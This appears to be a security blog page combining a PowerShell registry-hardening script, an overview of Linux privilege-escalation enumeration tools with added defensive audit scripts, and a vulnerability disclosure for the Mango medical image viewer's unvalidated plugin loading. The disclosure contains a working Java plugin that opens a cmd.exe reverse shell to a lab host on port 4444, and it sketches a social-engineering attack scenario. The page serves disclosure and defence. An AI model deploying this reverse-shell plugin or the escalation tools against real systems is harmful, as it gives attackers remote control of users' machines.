PowerShell Script to set Security Settings

This is a script that checks and, where necessary, sets specific registry values. The defaults are geared toward enforcing security settings recommended by Defender in places where Intune offers no equivalent option.

The defaults below:

  • Disable Flash (bEnableFlash = 0) in Acrobat Reader DC, Acrobat DC, Acrobat 11
  • Disable JavaScript (bDisableJavaScript = 1) in Acrobat Reader DC, Acrobat DC, Acrobat 11, Acrobat 2017
  • Disable Chrome’s Background Mode (BackgroundModeEnabled = 0)
  • Ensure RDP uses TLS (SecurityLayer = 2)

Flow:

If the KeyPath does not exist, the script exits.

If the KeyPath does exist but the KeyName does not, then a key with the KeyName is created and the value set.

If both the KeyPath and KeyName exist but the value differs then the registry value is changed to that dictated by the script below.

# Name: SecRegSettings.ps1
#
# About: This script takes an array of hashtables describing secure registry settings and loops through them.
#        For each entry it checks that the registry path exists, then whether the item property exists. If
#        the item property does not exist it is created; if it exists with a different value, the value is set.
#
# Arguments: @( [Ordered]@{KeyPath=<String>; KeyName=<String>; Value=<String>; Type=<String>} )
#
# KeyPath: Registry path which contains the value you want to enforce
# KeyName: The name of the value (item property) you want to check/set
# Value: The data the value should hold
# Type: The registry data type of the value (for example DWord or String)
#
# Version: 1.0
# Date: 2022-07-31

#Configure the HashTable Array:

$regdata = @(
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown";KeyName="bEnableFlash";Value="0";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDown";KeyName="bDisableJavaScript";Value="1";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDown";KeyName="bDisableJavaScript";Value="1";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDown";KeyName="bEnableFlash";Value="0";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Adobe Acrobat\11.0\FeatureLockDown";KeyName="bDisableJavaScript";Value="1";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Adobe Acrobat\11.0\FeatureLockDown";KeyName="bEnableFlash";Value="0";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Adobe\Acrobat\2017\FeatureLockDown";KeyName="bDisableJavaScript";Value="1";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SOFTWARE\Policies\Google\Chrome";KeyName="BackgroundModeEnabled";Value="0";Type="DWord"},
                [Ordered]@{KeyPath="HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp";KeyName="SecurityLayer";Value="2";Type="DWord"}
            )

# End Config

# Loop through HashTable Array
For ($i=0; $i -lt $regdata.Length; $i++) {

    # Does reg path exist?
    if(Test-Path -Path $regdata[$i].KeyPath) {

        $item = Get-ItemProperty  -Path $regdata[$i].KeyPath -Name $regdata[$i].KeyName -ErrorAction SilentlyContinue

        # Does the item already exist in the path?
        if( !($item) ) {

            # If item does NOT exist, create it with value defined in HashTable
            New-ItemProperty -Path $regdata[$i].KeyPath  -Name $regdata[$i].KeyName -Value $regdata[$i].Value -PropertyType $regdata[$i].Type

        } else {

            # If item DOES exist, check to ensure value is set to what HashTable says it should be
            if ( (Get-ItemPropertyValue -Path $regdata[$i].KeyPath -Name $regdata[$i].KeyName) -ne $regdata[$i].Value ) {

                # If the reg value differs from the expected value, set the value as defined in the HashTable
                Set-ItemProperty -Path $regdata[$i].KeyPath -Name $regdata[$i].KeyName -Value $regdata[$i].Value

            } #end set property if

        } #end check item if

    } #end path check if

} #end for loop
Linux Enumeration

Once access is established, the next step is typically to enumerate the system: learn what is present, which resources are accessible, and what the attack surface looks like.

This page covers several popular Linux scripts that automate this task. In CTF events they quickly provide useful information; in a real-world engagement, be aware that they generate a lot of “noise.” They can still serve as a foundation for building customized scripts.

Linux Smart Enumeration (LSE)

Linux enumeration tools for pentesting and CTFs

Project Page: https://github.com/diego-treitos/linux-smart-enumeration

The LSE project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests. Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

Use: ./lse.sh [options]

 OPTIONS
  -c           Disable color
  -i           Non interactive mode
  -h           This help
  -l LEVEL     Output verbosity level
                 0: Show highly important results. (default)
                 1: Show interesting results.
                 2: Show all gathered information.
  -s SELECTION Comma separated list of sections or tests to run. Available
               sections:
                 usr: User related tests.
                 sud: Sudo related tests.
                 fst: File system related tests.
                 sys: System related tests.
                 sec: Security measures related tests.
                 ret: Recurren tasks (cron, timers) related tests.
                 net: Network related tests.
                 srv: Services related tests.
                 pro: Processes related tests.
                 sof: Software related tests.
                 ctn: Container (docker, lxc) related tests.
                 cve: CVE related tests.
               Specific tests can be used with their IDs (i.e.: usr020,sud)
  -e PATHS     Comma separated list of paths to exclude. This allows you
               to do faster scans at the cost of completeness
  -p SECONDS   Time that the process monitor will spend watching for
               processes. A value of 0 will disable any watch (default: 60)
  -S           Serve the lse.sh script in this host so it can be retrieved
               from a remote host.

Proof of concept on how to get LSE on a remote system:

RootHelper

Project Page: https://github.com/NullArray/RootHelper

RootHelper aids in the process of privilege escalation on a Linux system that has been compromised. The latest version totals eleven scripts, from enumeration to exploit suggestion to exploit deployment. RootHelper ensures you have access to the best tools for the job.

SUID3NUM

Project Page: https://github.com/Anon-Exploiter/SUID3NUM

A standalone script, supporting both Python 2 and Python 3, that finds all SUID binaries on a machine (or CTF box) and does the following:

  • List all default SUID binaries (which ship with Linux and aren’t exploitable)
  • List all custom binaries (which don’t ship with packages or a vanilla installation)
  • List all custom binaries found in GTFOBins (this is where things get interesting)
  • Print binaries and their exploitation (in case they create files on the machine)
  • Try to exploit found custom SUID binaries that won’t impact the machine’s files
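The split SUID3NUM draws between default and custom SUID binaries is, from the defender's side, a change-detection problem: the finding is a setuid file that was not there when the host was built. The POSIX shell script below is an added example, not SUID3NUM's code and not from this page. It records a baseline of SUID paths from a known-good system and later reports only the files that are new. The baseline file name is a placeholder, and the directory it is exercised against is constructed.

```shell
#!/bin/sh
# Added example (not part of SUID3NUM or this page): detect SUID binaries that
# were not present when a host was built. The baseline is a plain list of
# absolute paths, one per line, recorded from a known-good system; anything
# SUID that is missing from that list is reported for review.
#
# Usage:  sh suid-baseline.sh record /  > /var/lib/suid-baseline.txt   (once)
#         sh suid-baseline.sh check  /  /var/lib/suid-baseline.txt    (periodically)
# The baseline path above is a placeholder; pick your own.

export LC_ALL=C   # byte-order sorting so `comm` sees identical ordering

# list_suid ROOT: print every regular file under ROOT with the setuid bit, sorted.
# -xdev stays on one filesystem so bind mounts and /proc are not walked.
list_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# new_suid ROOT BASELINE: print SUID files present now but absent from BASELINE.
# Always returns 0; empty output means nothing new. Files that disappeared are
# not reported, since removing a SUID binary does not add privilege-escalation risk.
new_suid() {
    sorted=$(mktemp)
    sort "$2" > "$sorted"
    list_suid "$1" | comm -23 - "$sorted"
    rm -f "$sorted"
}

case "${1:-}" in
    record) list_suid "${2:-/}" ;;
    check)  new_suid "${2:-/}" "$3" ;;
esac
```

Run `record` once after provisioning and store the result somewhere the host cannot rewrite (configuration management or a log collector); `check` then produces an empty result on a clean host and one path per new setuid file otherwise, which is a simple signal to forward to whatever alerting is in place.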

uptux

Project Page: https://github.com/initstring/uptux

Specialized privilege escalation checks for Linux systems.

Implemented so far:

  • Writable systemd paths, services, timers, and socket units
    • Disassembles systemd unit files looking for:
      • References to executables that are writable
      • References to broken symlinks pointing to writable directories
      • Relative path statements
      • Unix socket files that are writable (sneaky APIs)
  • Writable D-Bus paths
  • Overly permissive D-Bus service settings
  • HTTP APIs running as root and responding on file-bound Unix domain sockets
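The systemd checks uptux implements come down to file permissions and path resolution, which a hardening audit can cover in a few lines of POSIX shell. The script below is an added example, not uptux's code and not from this page. It flags service unit files writable by other users, `ExecStart` lines that use a relative path, and `ExecStart` targets writable by other users; it reads only the first `ExecStart=` line and only the "other" write bit, leaving group-writable files and drop-in directories to a fuller tool. The unit directory argument and the fixtures used to exercise it are constructed.

```shell
#!/bin/sh
# Added example (not uptux's code, not from this page): audit systemd service
# units for three of the weaknesses uptux looks for.
#   WRITABLE_UNIT  the unit file is writable by "other" users (ExecStart can be rewritten)
#   RELATIVE_EXEC  ExecStart names a relative path (systemd resolves it via PATH)
#   WRITABLE_EXEC  the program ExecStart points at is writable by "other" users
# Only the first ExecStart= line and the "other" write bit are examined.
# Usage: sh audit-units.sh /etc/systemd/system   (any unit directory works)

export LC_ALL=C

# other_writable PATH: succeed if the "other" write bit is set. Column 9 of
# `ls -ld` is that bit on both GNU and BSD userlands.
other_writable() {
    [ "$(ls -ld "$1" 2>/dev/null | cut -c9)" = "w" ]
}

# exec_path UNITFILE: print the program of the first ExecStart= line, after
# stripping systemd's prefix characters (-, @, :, +, !).
exec_path() {
    sed -n 's/^ExecStart=[-@:+!]*\([^ ]*\).*/\1/p' "$1" | head -n 1
}

# audit_units UNIT_DIR: one "CODE<TAB>unit<TAB>detail" line per finding.
# Always returns 0 so it is safe under `set -e`; no output means no findings.
audit_units() {
    dir="$1"
    for unit in "$dir"/*.service; do
        [ -f "$unit" ] || continue
        name=$(basename "$unit")
        if other_writable "$unit"; then
            printf 'WRITABLE_UNIT\t%s\t%s\n' "$name" "$unit"
        fi
        prog=$(exec_path "$unit")
        [ -n "$prog" ] || continue
        case "$prog" in
            /*) if [ -e "$prog" ] && other_writable "$prog"; then
                    printf 'WRITABLE_EXEC\t%s\t%s\n' "$name" "$prog"
                fi ;;
            *)  printf 'RELATIVE_EXEC\t%s\t%s\n' "$name" "$prog" ;;
        esac
    done
    return 0
}

if [ $# -gt 0 ]; then audit_units "$1"; fi
```

The tab-separated output is meant to be diffed between runs or shipped to a log pipeline; a non-empty result on a production host is worth a ticket, because each code corresponds to a way an unprivileged user could change what runs as root at the next service restart.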
Mango Vulnerability Disclosure Report

Mango – short for Multi-image Analysis GUI – is a viewer for medical research images. It provides analysis tools and a user interface to navigate image volumes.

source: https://ric.uthscsa.edu/mango/index.html


Versioning

| Version | Date | Author | Comment |
|---|---|---|---|
| 1.0 | 2022-06-13 | Jo | Initial document |
| 1.1 | 2022-07-31 | Jo | Added CVE-2022-34567 |

Disclosure Timeline

Disclosure followed the 90-day timeline used by Google’s Project Zero.

| Date | Comment |
|---|---|
| 2022-03-22 | UT’s Information Security Office notified via email; the response was to contact UTHSCSA’s Security Team (email address provided). |
| 2022-03-22 | UTHSCSA Security Team notified via email. Advised of responsible disclosure. |
| 2022-03-23 | UTHSCSA Security Team sent an update via email (note: this was a unilateral action; no response from UTHSCSA had been received). |
| 2022-06-22 | Vulnerability reported to MITRE. |
| 2022-06-22 | Vulnerability published publicly. |
| 2022-07-28 | CVE-2022-34567 |

Application Details

Vulnerability: Insecure Plugin Use/Implementation.

Overview: Mango allows third-party plugins to be used, and the product page lists some plugins that have been developed. Mango plugins are written in Java; as a platform-agnostic language, Java gives developers a lot of control over the operating system. Mango performs no plugin validation and gives users no notice when “new” plugins are added. In short, any properly crafted plugin placed in the plugin folder (which is user writable) is automatically loaded and executed by Mango. A threat actor could therefore craft a malicious plugin that, if deployed, would give the threat actor remote access with the same rights as the user running Mango.

Details: The assessor created a customized plugin and deployed it on a Windows test environment. The plugin was designed to integrate into Mango and, once loaded, to establish a connection (“reverse shell”) back to a remote testing computer (“attacker”).

Two tests were attempted and both succeeded. Each involved crafting a customized plugin (which we named “Evil Plugin”) and, with user-level permissions, moving Evil Plugin into C:\Users\<user name>\AppData\Roaming\Mango\Plugins. One test created a reverse shell to a remote computer; the other executed Calculator to demonstrate the ability to execute code on the system.
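Because Mango itself performs no validation, the compensating control has to sit outside the application: an inventory of the plugin folder checked against an allowlist of reviewed plugins. The script below is an added example, not Mango's code and not from this page. It hashes every file in a plugin directory, compares the digests with an allowlist in `sha256sum` format, and labels each file ALLOWED, MODIFIED (known name, different digest) or UNKNOWN (dropped-in file). The plugin folder and allowlist paths are placeholders, and the fixtures it is exercised against are constructed.

```shell
#!/bin/sh
# Added example (not Mango's code, not from this page): integrity check for a
# plugin directory. Mango loads every plugin found in its plugin folder with no
# validation, so the control has to live outside the application: compare the
# folder against an allowlist of SHA-256 digests of reviewed plugins and report
# anything else. Allowlist lines use sha256sum's "<digest>  <file name>" format.
# Usage: sh check-plugins.sh "$HOME/.mango/plugins" /etc/mango-plugins.sha256
# (both paths are placeholders; use the plugin folder for your platform).

export LC_ALL=C

# digest FILE: SHA-256 hex digest via GNU sha256sum or BSD shasum.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# check_plugins PLUGIN_DIR ALLOWLIST: print "STATUS<TAB>name" for every file.
#   ALLOWED   digest is on the allowlist
#   MODIFIED  name is on the allowlist but the digest differs (tampered or upgraded)
#   UNKNOWN   neither digest nor name is on the allowlist (dropped-in plugin)
# Always returns 0; names containing spaces are not supported by this format.
check_plugins() {
    dir="$1"; allow="$2"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        sum=$(digest "$f")
        if awk -v s="$sum" '$1 == s { hit = 1 } END { exit !hit }' "$allow"; then
            status=ALLOWED
        elif awk -v n="$name" '$2 == n { hit = 1 } END { exit !hit }' "$allow"; then
            status=MODIFIED
        else
            status=UNKNOWN
        fi
        printf '%s\t%s\n' "$status" "$name"
    done
    return 0
}

# unknown_count PLUGIN_DIR ALLOWLIST: number of files that are not ALLOWED;
# suitable as an alert threshold (anything above 0) in a monitoring job.
unknown_count() {
    check_plugins "$1" "$2" | grep -vc '^ALLOWED' || true
}

if [ $# -eq 2 ]; then check_plugins "$1" "$2"; fi
```

The allowlist is produced once by running `sha256sum` over the plugins an administrator has reviewed and should be stored where the Mango user cannot edit it; a scheduled run before Mango starts, or a periodic run from endpoint management, turns a silent plugin drop into a MODIFIED or UNKNOWN line that can be alerted on.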

[Screenshot: plugin folder before and after the move, and the results]

The image above shows that we started with an empty plugin folder and the Evil Plugin on the Desktop. We then moved the plugin from the Desktop to the plugin folder; no errors were encountered. We then launched Mango and, in its settings, observed that the Evil Plugin had been loaded.

[Screenshots: reverse shell, victim side after execution; reverse shell, attacker side after execution; Calculator execution]

Plugin Proof of Concept Code

package edu.uthscsa.ric.plugins.mangoplugin;

import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.net.URL;
import edu.uthscsa.ric.mango.MangoContext;
import edu.uthscsa.ric.mango.MangoData;
import edu.uthscsa.ric.mango.MangoPlugin;
import edu.uthscsa.ric.mango.ViewerController;
import edu.uthscsa.ric.mango.viewerslice.VolumeManager;
import edu.uthscsa.ric.volume.ImageVolume;

public class ExamplePlugin implements MangoPlugin {

	@Override
	public void doOperation(MangoContext mango, VolumeManager viewer) {

		String host="10.1.1.2";   // test "attacker" machine in the lab
		String cmd="cmd.exe";
		int port=4444;

		// doOperation declares no checked exceptions, so the socket and
		// process I/O below is wrapped in a try/catch so the class compiles.
		try {
			Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
			Socket s = new Socket(host,port);
			InputStream pi = p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
			OutputStream po = p.getOutputStream(),so=s.getOutputStream();
			// Relay the process's output to the socket and the socket's input
			// to the process until either side closes.
			while(!s.isClosed()) {
				while(pi.available()>0)
					so.write(pi.read());
				while(pe.available()>0)
					so.write(pe.read());
				while(si.available()>0)
					po.write(si.read());
				so.flush();
				po.flush();
				Thread.sleep(50);
				try {
					p.exitValue();   // throws while the process is still running
					break;
				}catch (Exception e){}
			}
			p.destroy();
			s.close();
		} catch (Exception e) {
			// PoC only: errors are ignored
		}
	}

	@Deprecated
	@Override
	public void doOperation(MangoData data, ViewerController controller) { }

	@Override
	public String getMinimumVersionSupported() { return null; }

	@Override
	public String getPluginName() { return "My Reverse Shell Plugin"; }

	@Override
	public URL getPluginURL() { return null; }

	@Override
	public String getVersion() { return null; }

	@Override
	public boolean hasNewerVersion() { return false; }
}

Observed Common Weakness Enumeration (CWE)

| CWE | Name | Common Consequences | Description |
|---|---|---|---|
| CWE-345 | Insufficient Verification of Data Authenticity | Varies by Context | The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data. |
| CWE-346 | Origin Validation Error | An attacker can access any functionality that is inadvertently accessible to the source. | The software does not properly verify that the source of data or communication is valid. |
| CWE-358 | Improperly Implemented Security Check for Standard | Bypass Protection Mechanism | The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique. |
| CWE-829 | Inclusion of Functionality from Untrusted Control Sphere | An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere. | The software imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere. |

Implications & Threat

According to Google Scholar, a search for Multi-image Analysis GUI (Mango) returns 298 results spanning 2018 to 2022 (accessed 2022-06-22). There are many potential attack scenarios in which the ability to quietly insert a plugin into a research tool could be leveraged to further a threat actor’s aims.

One example to highlight the above point would be:

  1. A threat actor targeting researchers (or organizations) conducts open source intelligence reconnaissance and compiles a list of cited software used by key targets.
  2. The threat actor discovers Multi-image Analysis GUI (Mango) permits the loading of modules without user interaction or notice and further custom modules could be crafted to achieve code execution.
  3. The threat actor crafts a social engineering campaign which induces the target to open a malicious document or file, or otherwise unknowingly start a process that drops a malicious module.
  4. The target, perhaps as part of the social engineering campaign, or otherwise, runs Mango. At this point the malicious payload could be unknowingly executed moving the threat actor closer to achieving their goal.